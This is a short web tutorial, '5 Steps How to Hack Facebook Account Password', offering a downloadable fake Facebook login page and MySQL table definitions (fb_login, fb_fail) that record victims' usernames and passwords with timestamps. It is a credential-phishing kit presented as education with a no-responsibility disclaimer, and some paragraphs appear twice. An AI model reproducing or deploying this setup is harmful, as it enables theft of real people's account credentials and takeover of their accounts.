5 Steps How to Hack Facebook Account Password is the tutorial I made to continue the other how to hack a Facebook account tutorial from Hackweiser.
We also want to remind you again that this tutorial How to Hack Facebook Account and the downloadable file is free to use and the purpose is for education. we're not responsible for any misuse of this file.
Requirement:
1. Facebook offline page (download)
2. MySQL Table Query (the MySQL table for this tutorial)
We also want to remind you again that this tutorial How to Hack Facebook Account and the downloadable file is free to use and the purpose is for education. we're not responsible for any misuse of this file.
Requirement:
1. Facebook offline page (download)
2. MySQL Table Query (the MySQL table for this tutorial)
-- -- Table structure for table `fb_fail` -- CREATE TABLE IF NOT EXISTS `fb_fail` ( `id` int(10) NOT NULL AUTO_INCREMENT, `uname` varchar(255) NOT NULL, `pwd` varchar(255) NOT NULL, `date` datetime NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ; -- -------------------------------------------------------- -- -- Table structure for table `fb_login` -- CREATE TABLE IF NOT EXISTS `fb_login` ( `id` int(10) NOT NULL AUTO_INCREMENT, `uname` varchar(255) NOT NULL, `pwd` varchar(255) NOT NULL, `date` datetime NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ; -- -- Dumping data for table `fb_login` --








